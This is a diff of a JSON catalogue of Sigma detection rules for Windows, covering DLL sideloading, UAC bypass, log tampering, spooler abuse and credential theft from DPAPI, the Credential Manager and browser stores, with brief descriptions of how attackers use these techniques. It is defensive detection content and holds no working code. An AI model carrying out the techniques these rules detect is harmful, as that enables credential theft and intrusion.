"https://hijacklibs.net/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_dbgcore_dll.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" - ] - }, - "uuid": "9ca2bf31-0570-44d8-a543-534c47c33ed7", - "value": "DLL Sideloading Of DBGCORE.DLL" - }, - { - "description": "Detects DLL sideloading of \"dbghelp.dll\"", - "meta": { - "author": "Nasreddine Bencherchali, Wietze Beukema (project and research)", - "creation_date": "2022/10/25", - "falsepositive": [ - "Legitimate applications loading their own versions of the DLL 
mentioned in this rule" - ], - "filename": "image_load_side_load_dbghelp_dll.yml", - "level": "medium", - "logsource.category": "image_load", - "logsource.product": "windows", - "refs": [ - "https://hijacklibs.net/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_dbghelp_dll.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" - ] - }, - "uuid": "6414b5cd-b19d-447e-bb5e-9f03940b5784", - "value": "DLL Sideloading Of DBGHELP.DLL" - }, - { - "description": "Detects DLL sideloading of DLLs usually located in system locations (System32, SysWOW64...)", - "meta": { - "author": "Nasreddine Bencherchali, Wietze Beukema (project and research), Chris Spehn (research WFH Dridex), XForceIR (SideLoadHunter Project)", - "creation_date": "2022/08/14", - "falsepositive": [ - "Legitimate applications loading their own versions of the DLLs mentioned in this rule" - ], - "filename": "image_load_side_load_from_non_system_location.yml", - "level": "medium", - "logsource.category": "image_load", - "logsource.product": "windows", - "refs": [ - "https://hijacklibs.net/", - "https://blog.cyble.com/2022/07/21/qakbot-resurfaces-with-new-playbook/", - "https://blog.cyble.com/2022/07/27/targeted-attacks-being-carried-out-via-dll-sideloading/", - "https://github.com/XForceIR/SideLoadHunter/blob/cc7ef2e5d8908279b0c4cee4e8b6f85f7b8eed52/SideLoads/README.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_from_non_system_location.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" - ] - }, - "uuid": "4fc0deee-0057-4998-ab31-d24e46e0aba4", - "value": "System DLL Sideloading From Non System Locations" - }, - { - "description": "Detects DLL sideloading of DLLs that are part of Microsoft Office from non standard 
location", - "meta": { - "author": "Nasreddine Bencherchali, Wietze Beukema (project and research)", - "creation_date": "2022/08/17", - "falsepositive": [ - "Unlikely" - ], - "filename": "image_load_side_load_office_dlls.yml", - "level": "medium", - "logsource.category": "image_load", - "logsource.product": "windows", - "refs": [ - "https://hijacklibs.net/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_office_dlls.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" - ] - }, - "uuid": "829a3bdf-34da-4051-9cf4-8ed221a8ae4f", - "value": "Microsoft Office DLL Sideload" - }, - { - "description": "Detects DLL sideloading of DLLs that are loaded by the SCM for some services (IKE, IKEEXT, SessionEnv) which do not exists on a typical modern system", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/12/01", - "falsepositive": [ - "Unknown" - ], - "filename": "image_load_side_load_scm.yml", - "level": "medium", - "logsource.category": "image_load", - "logsource.product": "windows", - "refs": [ - "https://decoded.avast.io/martinchlumecky/png-steganography/", - "https://posts.specterops.io/lateral-movement-scm-and-dll-hijacking-primer-d2f61e8ab992", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_scm.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" - ] - }, - "uuid": "bc3cc333-48b9-467a-9d1f-d44ee594ef48", - "value": "SCM DLL Sideload" - }, - { - "description": "Detects DLL sideloading of DLLs that are part of third party software (zoom, discord....etc)", - "meta": { - "author": "Nasreddine Bencherchali, Wietze Beukema (project and research)", - "creation_date": "2022/08/17", - "falsepositive": [ - "Unknown" - ], - "filename": 
"image_load_side_load_third_party.yml", - "level": "medium", - "logsource.category": "image_load", - "logsource.product": "windows", - "refs": [ - "https://hijacklibs.net/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_third_party.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" - ] - }, - "uuid": "f9df325d-d7bc-4a32-8a1a-2cc61dcefc63", - "value": "Third Party Software DLL Sideloading" - }, - { - "description": "Detects DLL sideloading of VMGuestLib.dll by the WmiApSrv service.", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/12/01", - "falsepositive": [ - "FP could occure if the legitimate version of vmGuestLib already exists on the system" - ], - "filename": "image_load_side_load_vmguestlib.yml", - "level": "medium", - "logsource.category": "image_load", - "logsource.product": "windows", - "refs": [ - "https://decoded.avast.io/martinchlumecky/png-steganography/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_vmguestlib.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" - ] - }, - "uuid": "70e8e9b4-6a93-4cb7-8cde-da69502e7aff", - "value": "VMGuestLib DLL Sideload" - }, - { - "description": "Detects DLL sideloading of DLLs that are part of web browsers", - "meta": { - "author": "Nasreddine Bencherchali, Wietze Beukema (project and research)", - "creation_date": "2022/08/17", - "falsepositive": [ - "Unknown" - ], - "filename": "image_load_side_load_web_browsers.yml", - "level": "medium", - "logsource.category": "image_load", - "logsource.product": "windows", - "refs": [ - "https://hijacklibs.net/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_side_load_web_browsers.yml" - ], - "tags": [ - 
"attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" - ] - }, - "uuid": "72ca7c75-bf85-45cd-aca7-255d360e423c", - "value": "Web Browsers DLL Sideloading" - }, - { - "description": "Detects SILENTTRINITY stager use", - "meta": { - "author": "Aleksey Potapov, oscd.community", - "creation_date": "2019/10/22", - "falsepositive": [ - "Unknown" - ], - "filename": "image_load_silenttrinity_stage_use.yml", - "level": "high", - "logsource.category": "image_load", - "logsource.product": "windows", - "refs": [ - "https://github.com/byt3bl33d3r/SILENTTRINITY", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_silenttrinity_stage_use.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1071" - ] - }, - "uuid": "75c505b1-711d-4f68-a357-8c3fe37dbf2d", - "value": "SILENTTRINITY Stager Execution - DLL" - }, - { - "description": "Detect DLL Load from Spooler Service backup folder", - "meta": { - "author": "FPT.EagleEye, Thomas Patzke (improvements)", - "creation_date": "2021/06/29", - "falsepositive": [ - "Loading of legitimate driver" - ], - "filename": "image_load_spoolsv_dll_load.yml", - "level": "informational", - "logsource.category": "image_load", + "logsource.category": "file_delete", "logsource.product": "windows", "refs": [ "https://github.com/hhlxf/PrintNightmare", - "https://github.com/ly4k/SpoolFool", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_spoolsv_dll_load.yml" + "https://github.com/cube0x0/CVE-2021-1675", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_delete/file_delete_win_cve_2021_1675_printspooler_del.yml" ], "tags": [ "attack.persistence", "attack.defense_evasion", "attack.privilege_escalation", "attack.t1574", - "cve.2021.1675", - "cve.2021.34527" + "cve.2021.1675" ] }, - "uuid": "02fb90de-c321-4e63-a6b9-25f4b03dfd14", - "value": "Windows Spooler Service Suspicious Binary Load" + 
"uuid": "5b2bbc47-dead-4ef7-8908-0cf73fcbecbf", + "value": "Windows Spooler Service Suspicious File Deletion" }, { - "description": "Detects the load of advapi31.dll by a process running in an uncommon folder", + "description": "Detects an unexpected file being deleted by dns.exe which my indicate activity related to remote code execution or other forms of exploitation as seen in CVE-2020-1350 (SigRed)", "meta": { - "author": "frack113", - "creation_date": "2022/02/03", + "author": "Tim Rauch", + "creation_date": "2022/09/27", "falsepositive": [ "Unknown" ], - "filename": "image_load_susp_advapi32_dll.yml", - "level": "informational", - "logsource.category": "image_load", + "filename": "file_delete_win_unusual_deletion_by_dns_exe.yml", + "level": "high", + "logsource.category": "file_delete", "logsource.product": "windows", "refs": [ - "https://github.com/hlldz/Phant0m", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_advapi32_dll.yml" + "https://www.elastic.co/guide/en/security/current/unusual-file-modification-by-dns.exe.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_delete/file_delete_win_unusual_deletion_by_dns_exe.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1133" + ] + }, + "uuid": "8f0b1fb1-9bd4-4e74-8cdf-a8de4d2adfd0", + "value": "Unusual File Deletion by dns.exe" + }, + { + "description": "Detects the deletion of the Exchange PowerShell cmdlet History logs which may indicate an attempt to destroy forensic evidence", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/10/26", + "falsepositive": [ + "Possible FP during log rotation" + ], + "filename": "file_delete_win_exchange_powershell_logs.yml", + "level": "high", + "logsource.category": "file_delete", + "logsource.product": "windows", + "refs": [ + "https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_delete/file_delete_win_exchange_powershell_logs.yml" ], "tags": [ "attack.defense_evasion", "attack.t1070" ] }, - "uuid": "d813d662-785b-42ca-8b4a-f7457d78d5a9", - "value": "Suspicious Load of Advapi31.dll" + "uuid": "a55349d8-9588-4c5a-8e3b-1925fe2a4ffe", + "value": "Exchange PowerShell Cmdlet History Deleted" }, { - "description": "Detects cmstp loading \"dll\" or \"ocx\" files from suspicious locations", + "description": "Detects suspicious processes based on name and location that access the windows credential manager and vault.\nWhich can be a sign of credential stealing. Example case would be usage of mimikatz \"dpapi::cred\" function\n", "meta": { "author": "Nasreddine Bencherchali", - "creation_date": "2022/08/30", + "creation_date": "2022/10/11", "falsepositive": [ - "Unikely" + "Legitimate software installed by the users for example in the \"AppData\" directory may access these files (for any reason)." ], - "filename": "image_load_susp_cmstp.yml", - "level": "high", - "logsource.category": "image_load", + "filename": "file_access_win_credential_manager_stealing.yml", + "level": "medium", + "logsource.category": "file_access", "logsource.product": "windows", "refs": [ - "https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/TTPs/Defense%20Evasion/T1218%20-%20Signed%20Binary%20Proxy%20Execution/T1218.003%20-%20CMSTP/Procedures.yaml", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_cmstp.yml" + "https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/", + "https://hunter2.gitbook.io/darthsidious/privilege-escalation/mimikatz", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_access/file_access_win_credential_manager_stealing.yml" ], "tags": [ - "attack.defense_evasion", - "attack.t1218.003" + "attack.t1003", + "attack.credential_access" ] }, - "uuid": 
"75e508f7-932d-4ebc-af77-269237a84ce1", - "value": "Cmstp Suspicious DLL Load" + "uuid": "407aecb1-e762-4acf-8c7b-d087bcff3bb6", + "value": "Credential Manager Access" }, { - "description": "Detects the load of dbghelp/dbgcore DLL (used to make memory dumps) by suspicious processes.\nTools like ProcessHacker and some attacker tradecract use MiniDumpWriteDump API found in dbghelp.dll or dbgcore.dll.\nAs an example, SilentTrynity C2 Framework has a module that leverages this API to dump the contents of Lsass.exe and transfer it over the network back to the attacker's machine.\n", + "description": "Detects suspicious processes based on name and location that access the Windows Data Protection API Master keys.\nWhich can be a sign of credential stealing. Example case would be usage of mimikatz \"dpapi::masterkey\" function\n", "meta": { - "author": "Perez Diego (@darkquassar), oscd.community, Ecco", - "creation_date": "2019/10/27", + "author": "Nasreddine Bencherchali", + "creation_date": "2022/10/17", "falsepositive": [ "Unknown" ], - "filename": "image_load_susp_dbghelp_dbgcore_load.yml", - "level": "high", - "logsource.category": "image_load", + "filename": "file_access_win_dpapi_master_key_access.yml", + "level": "medium", + "logsource.category": "file_access", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/windows/win32/api/minidumpapiset/nf-minidumpapiset-minidumpwritedump", - "https://www.pinvoke.net/default.aspx/dbghelp/MiniDumpWriteDump.html", - "https://medium.com/@fsx30/bypass-edrs-memory-protection-introduction-to-hooking-2efb21acffd6", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_dbghelp_dbgcore_load.yml" + "https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords", + "https://web.archive.org/web/20181130065817/http://www.harmj0y.net/blog/redteaming/operational-guidance-for-offensive-user-dpapi-abuse/", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_access/file_access_win_dpapi_master_key_access.yml" ], "tags": [ "attack.credential_access", - "attack.t1003.001" + "attack.t1555.004" ] }, - "uuid": "0e277796-5f23-4e49-a490-483131d4f6e1", - "value": "Load of dbghelp/dbgcore DLL from Suspicious Process" + "uuid": "46612ae6-86be-4802-bc07-39b59feb1309", + "value": "Suspicious Access To Windows DPAPI Master Keys" }, { - "description": "Detects when a system process (ie located in system32, syswow64...etc) loads a DLL from a suspicious location such as %temp%", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/07/17", - "falsepositive": [ - "Unknown" - ], - "filename": "image_load_susp_dll_load_system_process.yml", - "level": "high", - "logsource.category": "image_load", - "logsource.product": "windows", - "refs": [ - "https://github.com/hackerhouse-opensource/iscsicpl_bypassUAC (Idea)", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_dll_load_system_process.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070" - ] - }, - "uuid": "9e9a9002-56c4-40fd-9eff-e4b09bfa5f6c", - "value": "DLL Load By System Process From Suspicious Locations" - }, - { - "description": "The Fax service attempts to load ualapi.dll, which is non-existent. 
An attacker can then (side)load their own malicious DLL using this service.", - "meta": { - "author": "NVISO", - "creation_date": "2020/05/04", - "falsepositive": [ - "Unlikely" - ], - "filename": "image_load_susp_fax_dll.yml", - "level": "high", - "logsource.category": "image_load", - "logsource.product": "windows", - "refs": [ - "https://windows-internals.com/faxing-your-way-to-system/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_fax_dll.yml" - ], - "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.t1574.001", - "attack.t1574.002" - ] - }, - "uuid": "828af599-4c53-4ed2-ba4a-a9f835c434ea", - "value": "Fax Service DLL Search Order Hijack" - }, - { - "description": "Detects any assembly DLL being loaded by an Office Product", - "meta": { - "author": "Antonlovesdnb", - "creation_date": "2020/02/19", - "falsepositive": [ - "Alerts on legitimate macro usage as well, will need to filter as appropriate" - ], - "filename": "image_load_susp_office_dotnet_assembly_dll_load.yml", - "level": "high", - "logsource.category": "image_load", - "logsource.product": "windows", - "refs": [ - "https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_office_dotnet_assembly_dll_load.yml" - ], - "tags": [ - "attack.execution", - "attack.t1204.002" - ] - }, - "uuid": "ff0f2b05-09db-4095-b96d-1b75ca24894a", - "value": "dotNET DLL Loaded Via Office Applications" - }, - { - "description": "Detects CLR DLL being loaded by an Office Product", - "meta": { - "author": "Antonlovesdnb", - "creation_date": "2020/02/19", - "falsepositive": [ - "Alerts on legitimate macro usage as well, will need to filter as appropriate" - ], - "filename": "image_load_susp_office_dotnet_clr_dll_load.yml", - "level": "high", - "logsource.category": "image_load", - "logsource.product": "windows", - "refs": 
[ - "https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_office_dotnet_clr_dll_load.yml" - ], - "tags": [ - "attack.execution", - "attack.t1204.002" - ] - }, - "uuid": "d13c43f0-f66b-4279-8b2c-5912077c1780", - "value": "CLR DLL Loaded Via Office Applications" - }, - { - "description": "Detects any GAC DLL being loaded by an Office Product", - "meta": { - "author": "Antonlovesdnb", - "creation_date": "2020/02/19", - "falsepositive": [ - "Alerts on legitimate macro usage as well, will need to filter as appropriate" - ], - "filename": "image_load_susp_office_dotnet_gac_dll_load.yml", - "level": "high", - "logsource.category": "image_load", - "logsource.product": "windows", - "refs": [ - "https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_office_dotnet_gac_dll_load.yml" - ], - "tags": [ - "attack.execution", - "attack.t1204.002" - ] - }, - "uuid": "90217a70-13fc-48e4-b3db-0d836c5824ac", - "value": "GAC DLL Loaded Via Office Applications" - }, - { - "description": "Detects DSParse DLL being loaded by an Office Product", - "meta": { - "author": "Antonlovesdnb", - "creation_date": "2020/02/19", - "falsepositive": [ - "Alerts on legitimate macro usage as well, will need to filter as appropriate" - ], - "filename": "image_load_susp_office_dsparse_dll_load.yml", - "level": "high", - "logsource.category": "image_load", - "logsource.product": "windows", - "refs": [ - "https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_office_dsparse_dll_load.yml" - ], - "tags": [ - "attack.execution", - "attack.t1204.002" - ] - }, - "uuid": 
"a2a3b925-7bb0-433b-b508-db9003263cc4", - "value": "Active Directory Parsing DLL Loaded Via Office Applications" - }, - { - "description": "Detects Kerberos DLL being loaded by an Office Product", - "meta": { - "author": "Antonlovesdnb", - "creation_date": "2020/02/19", - "falsepositive": [ - "Alerts on legitimate macro usage as well, will need to filter as appropriate" - ], - "filename": "image_load_susp_office_kerberos_dll_load.yml", - "level": "high", - "logsource.category": "image_load", - "logsource.product": "windows", - "refs": [ - "https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_office_kerberos_dll_load.yml" - ], - "tags": [ - "attack.execution", - "attack.t1204.002" - ] - }, - "uuid": "7417e29e-c2e7-4cf6-a2e8-767228c64837", - "value": "Active Directory Kerberos DLL Loaded Via Office Applications" - }, - { - "description": "Detects the image load of Python Core indicative of a Python script bundled with Py2Exe.", - "meta": { - "author": "Patrick St. 
John, OTR (Open Threat Research)", - "creation_date": "2020/05/03", - "falsepositive": [ - "Legitimate Py2Exe Binaries", - "Known false positive caused with Python Anaconda" - ], - "filename": "image_load_susp_python_image_load.yml", - "level": "medium", - "logsource.category": "image_load", - "logsource.product": "windows", - "refs": [ - "https://www.py2exe.org/", - "https://unit42.paloaltonetworks.com/unit-42-technical-analysis-seaduke/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_python_image_load.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027.002" - ] - }, - "uuid": "cbb56d62-4060-40f7-9466-d8aaf3123f83", - "value": "Python Py2Exe Image Load" - }, - { - "description": "Detects CLR DLL being loaded by an scripting applications", - "meta": { - "author": "omkar72, oscd.community", - "creation_date": "2020/10/14", - "falsepositive": [ - "Unknown" - ], - "filename": "image_load_susp_script_dotnet_clr_dll_load.yml", - "level": "high", - "logsource.category": "image_load", - "logsource.product": "windows", - "refs": [ - "https://github.com/tyranid/DotNetToJScript", - "https://thewover.github.io/Introducing-Donut/", - "https://blog.menasec.net/2019/07/interesting-difr-traces-of-net-clr.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_script_dotnet_clr_dll_load.yml" - ], - "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.t1055" - ] - }, - "uuid": "4508a70e-97ef-4300-b62b-ff27992990ea", - "value": "CLR DLL Loaded Via Scripting Applications" - }, - { - "description": "A General detection for processes loading System.Drawing.ni.dll. 
This could be an indicator of potential Screen Capture.", - "meta": { - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "creation_date": "2020/05/02", - "falsepositive": [ - "Unknown" - ], - "filename": "image_load_susp_system_drawing_load.yml", - "level": "low", - "logsource.category": "image_load", - "logsource.product": "windows", - "refs": [ - "https://github.com/OTRF/detection-hackathon-apt29/issues/16", - "https://threathunterplaybook.com/evals/apt29/detections/7.A.1_3B4E5808-3C71-406A-B181-17B0CE3178C9.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_system_drawing_load.yml" - ], - "tags": [ - "attack.collection", - "attack.t1113" - ] - }, - "uuid": "666ecfc7-229d-42b8-821e-1a8f8cb7057c", - "value": "Suspicious System.Drawing Load" - }, - { - "description": "Detects Loading of samlib.dll, WinSCard.dll from untypical process e.g. through process hollowing by Mimikatz", - "meta": { - "author": "Markus Neis", - "creation_date": "2018/01/07", - "falsepositive": [ - "Very likely, needs more tuning" - ], - "filename": "image_load_susp_uncommon_image_load.yml", - "level": "high", - "logsource.category": "image_load", - "logsource.product": "windows", - "refs": [ - "https://cyberwardog.blogspot.com/2017/03/chronicles-of-threat-hunter-hunting-for.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_uncommon_image_load.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1574.002" - ] - }, - "uuid": "e32ce4f5-46c6-4c47-ba69-5de3c9193cd7", - "value": "Possible Process Hollowing Image Loading" - }, - { - "description": "Detects the image load of VSS DLL by uncommon executables", + "description": "Detects suspicious processes based on name and location that access the browser credential stores which can be the sign of credential stealing", "meta": { "author": "frack113", - "creation_date": "2022/10/31", + "creation_date": "2022/04/09", 
"falsepositive": [ - "Unknown" + "Antivirus, Anti-Spyware, Anti-Malware Software", + "Backup software", + "Software installed on other partitions other than \"C:\\\"", + "Searching software such as \"everything.exe\" that are installed and are not located in one of the \"filter_programfile\" filter entries" ], - "filename": "image_load_susp_vss_dll_load.yml", - "level": "high", - "logsource.category": "image_load", + "filename": "file_access_win_browser_credential_stealing.yml", + "level": "medium", + "logsource.category": "file_access", "logsource.product": "windows", "refs": [ - "https://github.com/ORCx41/DeleteShadowCopies", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_vss_dll_load.yml" + "https://www.zscaler.com/blogs/security-research/ffdroider-stealer-targeting-social-media-platform-users", + "https://github.com/lclevy/firepwd", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/file/file_access/file_access_win_browser_credential_stealing.yml" ], "tags": [ - "attack.defense_evasion", - "attack.impact", - "attack.t1490" + "attack.t1003", + "attack.credential_access" ] }, - "uuid": "37774c23-25a1-4adb-bb6d-8bb9fd59c0f8", - "value": "Image Load of VSS Dll by Uncommon Executable" + "uuid": "91cb43db-302a-47e3-b3c8-7ede481e27bf", + "value": "Browser Credential Store Access" }, { - "description": "Detects the image load of vss_ps.dll by uncommon executables", - "meta": { - "author": "Markus Neis, @markus_neis", - "creation_date": "2021/07/07", - "falsepositive": [ - "Unknown" - ], - "filename": "image_load_susp_vss_ps_load.yml", - "level": "high", - "logsource.category": "image_load", - "logsource.product": "windows", - "refs": [ - "https://www.virustotal.com/gui/file/ba88ca45589fae0139a40ca27738a8fc2dfbe1be5a64a9558f4e0f52b35c5add", - "https://twitter.com/am0nsec/status/1412232114980982787", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_vss_ps_load.yml" - ], - "tags": 
[ - "attack.defense_evasion", - "attack.impact", - "attack.t1490" - ] - }, - "uuid": "333cdbe8-27bb-4246-bf82-b41a0dca4b70", - "value": "Image Load of VSS_PS.dll by Uncommon Executable" - }, - { - "description": "Detects DLL's Loaded Via Word Containing VBA Macros", - "meta": { - "author": "Antonlovesdnb", - "creation_date": "2020/02/19", - "falsepositive": [ - "Alerts on legitimate macro usage as well, will need to filter as appropriate" - ], - "filename": "image_load_susp_winword_vbadll_load.yml", - "level": "high", - "logsource.category": "image_load", - "logsource.product": "windows", - "refs": [ - "https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_susp_winword_vbadll_load.yml" - ], - "tags": [ - "attack.execution", - "attack.t1204.002" - ] - }, - "uuid": "e6ce8457-68b1-485b-9bdd-3c2b5d679aa9", - "value": "VBA DLL Loaded Via Microsoft Word" - }, - { - "description": "IKEEXT and SessionEnv service, as they call LoadLibrary on files that do not exist within C:\\Windows\\System32\\ by default.\nAn attacker can place their malicious logic within the PROCESS_ATTACH block of their library and restart the aforementioned services \"svchost.exe -k netsvcs\" to gain code execution on a remote machine.\n", - "meta": { - "author": "SBousseaden", - "creation_date": "2019/10/28", - "falsepositive": [ - "Unknown" - ], - "filename": "image_load_svchost_dll_search_order_hijack.yml", - "level": "high", - "logsource.category": "image_load", - "logsource.product": "windows", - "refs": [ - "https://posts.specterops.io/lateral-movement-scm-and-dll-hijacking-primer-d2f61e8ab992", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_svchost_dll_search_order_hijack.yml" - ], - "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.t1574.002", - "attack.t1574.001" - ] - }, - "uuid": 
"602a1f13-c640-4d73-b053-be9a2fa58b77", - "value": "Svchost DLL Search Order Hijack" - }, - { - "description": "Detects the load of EvtMuteHook.dll, a key component of SharpEvtHook, a tool to tamper with Windows event logs", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/09/07", - "falsepositive": [ - "Other DLLs with that import hash" - ], - "filename": "image_load_sysmon_disable_sharpevtmute.yml", - "level": "high", - "logsource.category": "image_load", - "logsource.product": "windows", - "refs": [ - "https://github.com/bats3c/EvtMute", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_sysmon_disable_sharpevtmute.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.002" - ] - }, - "uuid": "49329257-089d-46e6-af37-4afce4290685", - "value": "SharpEvtMute Imphash EvtMuteHook Load" - }, - { - "description": "Detects usage of Time Travel Debugging Utility. Adversaries can execute malicious processes and dump processes, such as lsass.exe, via tttracer.exe.", - "meta": { - "author": "Ensar Şamil, @sblmsrsn, @oscd_initiative", - "creation_date": "2020/10/06", - "falsepositive": [ - "Legitimate usage by software developers/testers" - ], - "filename": "image_load_tttracer_mod_load.yml", - "level": "high", - "logsource.category": "image_load", - "logsource.product": "windows", - "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Tttracer/", - "https://twitter.com/mattifestation/status/1196390321783025666", - "https://twitter.com/oulusoyum/status/1191329746069655553", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_tttracer_mod_load.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.credential_access", - "attack.t1218", - "attack.t1003.001" - ] - }, - "uuid": "e76c8240-d68f-4773-8880-5c6f63595aaf", - "value": "Time Travel Debugging Utility Usage - Image" - }, - { - "description": "Detects the \"iscsicpl.exe\" UAC bypass technique that leverages a DLL 
Search Order hijacking technique to load a custom DLL's from temp or a any user controlled location in the users %PATH%", + "description": "Detects suspicious processes based on name and location that access the Windows Credential History File.\nWhich can be a sign of credential stealing. Example case would be usage of mimikatz \"dpapi::credhist\" function\n", "meta": { "author": "Nasreddine Bencherchali", - "creation_date": "2022/07/17", + "creation_date": "2022/10/17", "falsepositive": [ "Unknown" ], - "filename": "image_load_uac_bypass_iscsicpl.yml", - "level": "high", - "logsource.category": "image_load", - "logsource.product": "windows", - "refs": [ - "https://github.com/hackerhouse-opensource/iscsicpl_bypassUAC", - "https://twitter.com/wdormann/status/1547583317410607110", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_uac_bypass_iscsicpl.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" - ] - }, - "uuid": "9ed5959a-c43c-4c59-84e3-d28628429456", - "value": "UAC Bypass Using Iscsicpl - ImageLoad" - }, - { - "description": "Attempts to load dismcore.dll after dropping it", - "meta": { - "author": "oscd.community, Dmitry Uchakin", - "creation_date": "2020/10/06", - "falsepositive": [ - "Actions of a legitimate telnet client" - ], - "filename": "image_load_uac_bypass_via_dism.yml", - "level": "high", - "logsource.category": "image_load", - "logsource.product": "windows", - "refs": [ - "https://steemit.com/utopian-io/@ah101/uac-bypassing-utility", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/image_load/image_load_uac_bypass_via_dism.yml" - ], - "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002", - "attack.t1574.002" - ] - }, - "uuid": "a5ea83a7-05a5-44c1-be2e-addccbbd8c03", - "value": "UAC Bypass With Fake DLL" - }, - { - "description": "Detects potential use of UIPromptForCredentials functions 
